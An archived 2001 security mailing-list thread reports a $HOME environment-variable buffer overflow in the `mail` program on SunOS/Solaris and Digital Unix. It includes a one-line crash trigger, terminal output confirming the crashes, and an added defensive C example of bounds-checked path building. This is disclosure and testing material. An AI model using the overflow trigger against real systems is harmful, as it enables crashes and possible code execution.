> On Mon, Jun 04, 2001 at 06:14:30PM +0300, Georgi Guninski wrote:
> > $HOME buffer overflow in SunOS 5.8 x86
> >
> > Systems affected:
> > SunOS 5.8 x86 have not tested on other OSes
> >
> > Risk: Medium
> > Date: 4 June 2001
> >
> > Details:
> > HOME=`perl -e 'print "A"x1100'` ; export HOME
> > mail a
> > CTL-C
> > eip gets smashed with 0x41414141.
> >
>
> 0:jpmeier@sol:~> HOME=`perl -e 'print "A"x1100'` ; export HOME
> 0:jpmeier@sol:/home/jpmeier> mail a
> ^Cmail: Mail saved in dead.letter
> 1:jpmeier@sol:/home/jpmeier> uname -a
> SunOS sol 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-5_10
>
>
> also tried larger buffers.
>
>
> Solaris/sparc appears not vulnerable. Maybe it's an x86 bug only

Solaris 7/Sparc is vulnerable:

[gwolf@sun gwolf]$ uname -a
SunOS sun.mydomain.org 5.7 Generic_106541-16 sun4u sparc SUNW,Ultra-5_10
[gwolf@sun gwolf]$ HOME=`perl -e 'print "A"x1100'` ; export HOME
[gwolf@sun gwolf]$ mail a
^Cmail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
(...)

Digital Unix V4.0C is vulnerable:

digital> uname -a
OSF1 digital V4.0 564.32 alpha
digital> setenv HOME `perl -e 'print "a"x1100'`
Received disconnect: Command terminated on signal 6.
[and I am logged out of the machine]

I tested it also on OpenBSD 2.8/i386 and /sparc, RedHat Linux 6.1/alpha and Debian GNU/Linux 2.2r3/i386, and they are not vulnerable.

------------------------------------------------------------
Gunnar Wolf - gwolfat_private - (+52)5623-1119
Desarrollo y Admon. de Sistemas en Red - FES Iztacala - UNAM
Departamento de Seguridad en Computo - DGSCA - UNAM
------------------------------------------------------------
Quidquid latine dictum sit, altum viditur.
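The thread above reports crashes when `$HOME` is 1100 bytes long but does not show the code in `mail` that handles it. As an added example (not part of the original messages and not code from any vendor's `mail`), the following C sketch shows the defensive pattern for this bug class: an environment-supplied path is joined to a file name only after its length has been checked against the destination buffer. The helper name `build_home_path`, the 1024-byte `PATH_BUF`, and the unchecked pattern in the comment are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF 1024  /* assumed size of a fixed path buffer */

/*
 * Unchecked pattern (assumption, shown as a comment only):
 *     char path[PATH_BUF];
 *     strcpy(path, getenv("HOME"));
 *     strcat(path, "/dead.letter");
 * A 1100-byte HOME writes past the end of path.
 *
 * build_home_path (hypothetical helper): write "<home>/<name>" into out.
 * Returns 0 on success, -1 if home is unset or empty, or if the result
 * (including the terminating NUL) does not fit in outsz bytes.
 * On failure out is left empty, never holding a truncated path.
 */
int build_home_path(const char *home, const char *name, char *out, size_t outsz)
{
    int n;

    if (out == NULL || outsz == 0)
        return -1;
    out[0] = '\0';
    if (home == NULL || home[0] == '\0' || name == NULL)
        return -1;
    n = snprintf(out, outsz, "%s/%s", home, name);
    if (n < 0 || (size_t)n >= outsz) {   /* would not fit: refuse */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

int main(void)
{
    char path[PATH_BUF];
    char big[1101];

    memset(big, 'A', 1100);   /* constructed input, same length as in the thread */
    big[1100] = '\0';
    printf("1100-byte HOME -> %d\n",
           build_home_path(big, "dead.letter", path, sizeof path));
    if (build_home_path(getenv("HOME"), "dead.letter", path, sizeof path) == 0)
        printf("current HOME   -> %s\n", path);
    return 0;
}
```

Rejecting the over-long value outright, instead of silently truncating it, keeps the program from writing to a path the user did not intend.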
This archive was generated by hypermail 2b30 : Tue Jun 05 2001 - 17:37:45 PDT